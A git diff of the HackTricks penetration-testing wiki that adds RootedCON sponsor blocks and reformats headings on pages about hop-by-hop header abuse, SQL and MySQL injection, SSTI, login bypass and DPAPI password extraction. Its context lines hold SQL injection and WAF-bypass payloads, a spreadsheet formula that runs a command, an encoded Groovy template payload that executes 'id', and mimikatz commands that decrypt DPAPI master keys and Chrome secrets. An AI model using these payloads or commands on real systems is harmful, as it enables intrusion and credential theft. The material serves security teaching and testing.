-# What is a hop-by-hop header? +​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + +## What is a hop-by-hop header? A hop-by-hop header is a header which is designed to be processed and consumed by the proxy currently handling the request, as opposed to an end-to-end header. @@ -29,13 +30,13 @@ Further to these defaults, a request [may also define a custom set of headers to Connection: close, X-Foo, X-Bar ``` -# The theory on abusing hop-by-hop headers +## The theory on abusing hop-by-hop headers In theory, proxies should remove hop-by-hop headers received before sending them to the next address. But you can find in the wild that this is done by some proxies and others just send all the headers adding its own `Connection`header. ![](<../.gitbook/assets/image (138).png>) -# Testing hop-by-hop deletions +## Testing hop-by-hop deletions If you find a header that makes the response of the server changes if it is set of if it is not, then you can search for hop-by-hop deletions. For example, the cookie header will make the response of the server to be dramatically different if it is set (with a valid content) and if it is not. 
@@ -49,42 +50,44 @@ for HEADER in $(cat headers.txt); do python poison-test.py -u "https://target" - This will cycle through the entire header list and print out if its presence in the hop-by-hop list created a different status code or response body size. -# Abusing X-Forwarded-For +## Abusing X-Forwarded-For In general, proxies will add the IPs of the clients inside the `X-Forwarded-For` header so the next hop will know where does the petition comes from. However, if an attacker sends a Connection value like `Connection: close, X-Forwarded-For` and the first proxy sends the hop-by-hop headers with their values (it sends the special Connection value), then the second value may delete the X-Forward-For header.\ At the end, the final App won't know who sent the request and may think that it was the last proxy, and is this scenario an attacker may be able to access resources protected by IP whitelisting (maybe some `/admin` ?). Depending on the system being targeted, you may also have `Forwarded`, `X-Real-IP`, and a bunch of others that are less common. -# Detecting Proxies and fingerprinting services +## Detecting Proxies and fingerprinting services This technique may be useful to detect proxies (using the cookie technique) or even to detect services. For example, if you abuse this technique to delete the header `X-BLUECOAT-VIA` and an error is thrown, then you have find that Bluecoat was being used. -# Other Attacks +## Other Attacks * For a possible DoS Cache poisoning abusing this technique read the original link * This could be useful in attacks that may allow you to insert new headers (low probability) * Also,it could be useful to bypass defensive functionalities. For example, if the lack of a header means that a request shouldn't be processed by a WAF, you could bypass a WAF with this technique. -# References +## References {% embed url="https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers" %} +​ + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.\ + + +{% embed url="https://www.rootedcon.com/" %}
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/pentesting-web/formula-doc-latex-injection.md b/pentesting-web/formula-doc-latex-injection.md index 457e68c34..5d35a1d82 100644 --- a/pentesting-web/formula-doc-latex-injection.md +++ b/pentesting-web/formula-doc-latex-injection.md @@ -66,7 +66,7 @@ The good news is that **this payload is executed automatically when the file is It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`** -![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1).png>) +![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png>) ### More diff --git a/pentesting-web/login-bypass/README.md b/pentesting-web/login-bypass/README.md index 5a43da0b6..245a049c8 100644 --- a/pentesting-web/login-bypass/README.md +++ b/pentesting-web/login-bypass/README.md 
@@ -4,18 +4,20 @@ Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## **Bypass regular login** If you find a login page, here you can find some techniques to try to bypass it: @@ -104,18 +106,22 @@ Pages usually redirects users after login, check if you can alter that redirect * Check if you can **enumerate usernames** abusing the login functionality. * Check if **auto-complete** is active in the password/**sensitive** information **forms** **input:** `
+ +​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
diff --git a/pentesting-web/saml-attacks/README.md b/pentesting-web/saml-attacks/README.md index 9a6429bbd..4edfc1e76 100644 --- a/pentesting-web/saml-attacks/README.md +++ b/pentesting-web/saml-attacks/README.md @@ -22,7 +22,7 @@ ## Attacks Graphic -![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1) (2).png>) +![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1).png>) ## Tool diff --git a/pentesting-web/sql-injection/README.md b/pentesting-web/sql-injection/README.md index 4647015c6..8e51369cf 100644 --- a/pentesting-web/sql-injection/README.md +++ b/pentesting-web/sql-injection/README.md @@ -12,6 +12,14 @@ +​ + +
+ +​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## What is SQL injection? SQL injection is a web security vulnerability that allows an attacker to **interfere** with the **queries** that an application makes to its **database**. It generally allows an attacker to **view data** that they are not normally able to retrieve. This might include data belonging to **other users**, or any other data that the **application** itself is able to **access**. In many cases, an attacker can **modify** or **delete** this data, causing persistent changes to the application's content or behaviour.\ @@ -294,6 +302,14 @@ We have already discussed all the ways to exploit a SQL Injection vulnerability. Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) + + +
+ +​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## Authentication bypass List to try to bypass the login functionality: @@ -443,6 +459,14 @@ Using **hex** and **replace** (and **substr**): '+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+' ``` +​ + +
+ +​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## Routed SQL injection Routed SQL injection is a situation where the injectable query is not the one which gives output but the output of injectable query goes to the query which gives output. ([Paper](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt)) @@ -555,6 +579,16 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt" %} + + +​ + +
+ +​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! diff --git a/pentesting-web/sql-injection/mysql-injection/README.md b/pentesting-web/sql-injection/mysql-injection/README.md index 068e3a420..a6864de98 100644 --- a/pentesting-web/sql-injection/mysql-injection/README.md +++ b/pentesting-web/sql-injection/mysql-injection/README.md @@ -1,25 +1,24 @@ - +# MySQL injection
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
-**This is a basic flow of how to confirm and perform a basic MySQL Injection. For more information go to:** [**https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md**](https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md) +​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. -# Comments +{% embed url="https://www.rootedcon.com/" %} + +## Comments ```sql -- MYSQL Comment @@ -29,9 +28,9 @@ /*!32302 10*/ Comment for MySQL version 3.23.02 ``` -# Interesting Functions +## Interesting Functions -## Confirm Mysql: +### Confirm Mysql: ``` concat('a','b') @@ -47,7 +46,7 @@ length(1) count(1) ``` -## Useful functions +### Useful functions ```sql SELECT hex(database()) @@ -65,7 +64,7 @@ SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END) strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep() ``` -# All injection +## All injection ```sql SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/" @@ -73,7 +72,7 @@ SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCH from [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/) -# Flow +## Flow Remember that in "modern" versions of **MySQL** you can substitute "_**information\_schema.tables**_" for "_**mysql.innodb\_table\_stats**_**"** (This could be useful to bypass WAFs). 
@@ -84,17 +83,17 @@ SELECT , FROM ; #Get values SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges ``` -## **Only 1 value** +### **Only 1 value** * `group_concat()` * `Limit X,1` -## **Blind one by one** +### **Blind one by one** * `substr(version(),X,1)='r'` or `substring(version(),X,1)=0x70` or `ascii(substr(version(),X,1))=112` * `mid(version(),X,1)='5'` -## **Blind adding** +### **Blind adding** * `LPAD(version(),1...lenght(version()),'1')='asd'...` * `RPAD(version(),1...lenght(version()),'1')='asd'...` @@ -102,7 +101,7 @@ SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges * `SELECT LEFT(version(),1...lenght(version()))='asd'...` * `SELECT INSTR('foobarbar', 'fo...')=1` -# Detect number of columns +## Detect number of columns Using a simple ORDER @@ -119,7 +118,15 @@ UniOn SeLect 1,2,3 ... ``` -# MySQL Union Based +​ + +
+ +​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + +## MySQL Union Based ```sql UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata @@ -128,21 +135,21 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_sc UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+... ``` -# SSRF +## SSRF **Learn here different options to** [**abuse a Mysql injection to obtain a SSRF**](mysql-ssrf.md)**.** -# WAF bypass tricks +## WAF bypass tricks -## Information\_schema alternatives +### Information\_schema alternatives -Remember that in "modern" versions of **MySQL** you can substitute _**information\_schema.tables**_ for _**mysql.innodb\_table\_stats**_** ** or for _**sys.x$schema\_flattened\_keys**_ or for **sys.schema\_table\_statistics** +Remember that in "modern" versions of **MySQL** you can substitute _**information\_schema.tables**_ for _**mysql.innodb\_table\_stats**_\*\* \*\* or for _**sys.x$schema\_flattened\_keys**_ or for **sys.schema\_table\_statistics** ![](<../../../.gitbook/assets/image (154).png>) ![](<../../../.gitbook/assets/image (155).png>) -## MySQLinjection without COMMAS +### MySQLinjection without COMMAS Select 2 columns without using any comma ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)): 
@@ -150,7 +157,7 @@ Select 2 columns without using any comma ([https://security.stackexchange.com/qu -1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1# ``` -## Retrieving values without the column name +### Retrieving values without the column name If at some point you know the name of the table but you don't know the name of the columns inside the table, you can try to find how may columns are there executing something like: @@ -169,11 +176,11 @@ select (select 1, 'flaf') = (SELECT * from demo limit 1); More info in [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952) -## MySQL history +### MySQL history You ca see other executions inside the MySQL reading the table: **sys.x$statement\_analysis** -## Version alternative**s** +### Version alternative**s** ``` mysql> select @@innodb_version; @@ -198,21 +205,22 @@ mysql> mysql> select version(); +-------------------------+ ``` +​ + +
+ +​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %}
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md index fe8ab2b9d..a3f4160c7 100644 --- a/pentesting-web/ssti-server-side-template-injection/README.md +++ b/pentesting-web/ssti-server-side-template-injection/README.md @@ -1,7 +1,5 @@ # SSTI (Server Side Template Injection) -## SSTI (Server Side Template Injection) -
Support HackTricks and get benefits! @@ -14,6 +12,12 @@
+
+ +[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## What is server-side template injection? A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. @@ -427,6 +431,16 @@ this.evaluate(new String(java.util.Base64.getDecoder().decode("QGdyb292eS50cmFuc this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82,117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120})) ``` + + +
+ +​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + +## + ### Smarty (PHP) ```php @@ -819,7 +833,7 @@ Check the rest of [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/mast ## BlackHat PDF -{% file src="../../.gitbook/assets/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15.pdf" %} +{% file src="../../.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf" %} ## Related Help @@ -842,6 +856,12 @@ If you think it could be useful, read: * [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI) * [**https://portswigger.net/web-security/server-side-template-injection**](https://portswigger.net/web-security/server-side-template-injection) +
+ +​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! diff --git a/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md index 81fe292ac..9ad7fafa4 100644 --- a/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md +++ b/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md @@ -12,6 +12,16 @@
+
+ +​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + + + + + While creating this post mimikatz was having problems with every action that interacted with DPAPI therefore **most of the examples and images were taken from**: [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#extracting-dpapi-backup-keys-with-domain-admin) ## What is DPAPI @@ -120,8 +130,6 @@ dpapi::masterkey /in:"C:\Users\\AppData\Roaming\Microsoft\Protect\S-1- The master key of the file will appear in the output. -![](<../../.gitbook/assets/image (325).png>) - Finally, you can use that **masterkey** to **decrypt** the **credential file**: ``` @@ -154,8 +162,6 @@ Using the retrieved backup key, let's decrypt user's `spotless` master key: dpapi::masterkey /in:"C:\Users\spotless.OFFENSE\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk ``` -![](<../../.gitbook/assets/image (328).png>) - We can now decrypt user's `spotless` chrome secrets using their decrypted master key: ``` @@ -183,8 +189,6 @@ With extracted from LDAP computers list you can find every sub network even if y "Because Domain Admin rights are not enough. Hack them all." -![](../../.gitbook/assets/HEKATOMB.png) - ## DonPAPI [**DonPAPI**](https://github.com/login-securite/DonPAPI) can dump secrets protected by DPAPI automatically. 
@@ -194,6 +198,14 @@ With extracted from LDAP computers list you can find every sub network even if y * [https://www.passcape.com/index.php?section=docsys\&cmd=details\&id=28#13](https://www.passcape.com/index.php?section=docsys\&cmd=details\&id=28#13) * [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#using-dpapis-to-encrypt-decrypt-data-in-c) + + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits!
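Review bot: in the SSTI hunk `@@ -427,6 +431,16 @@`, the added `## ` line with no heading text, placed between `{% embed url="https://www.rootedcon.com/" %}` and `### Smarty (PHP)`, renders as an empty second-level heading and leaves the Smarty subsection (and the `###` sections that follow it) under a nameless parent in the table of contents; drop that line, or give it the heading those subsections belong under. The same hunk's `[**RootedCON**]` line also carries two leading zero-width spaces (`​​[**RootedCON**]`) that the first copy of the block at the top of this section does not; strip them so the sponsor blocks render identically.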
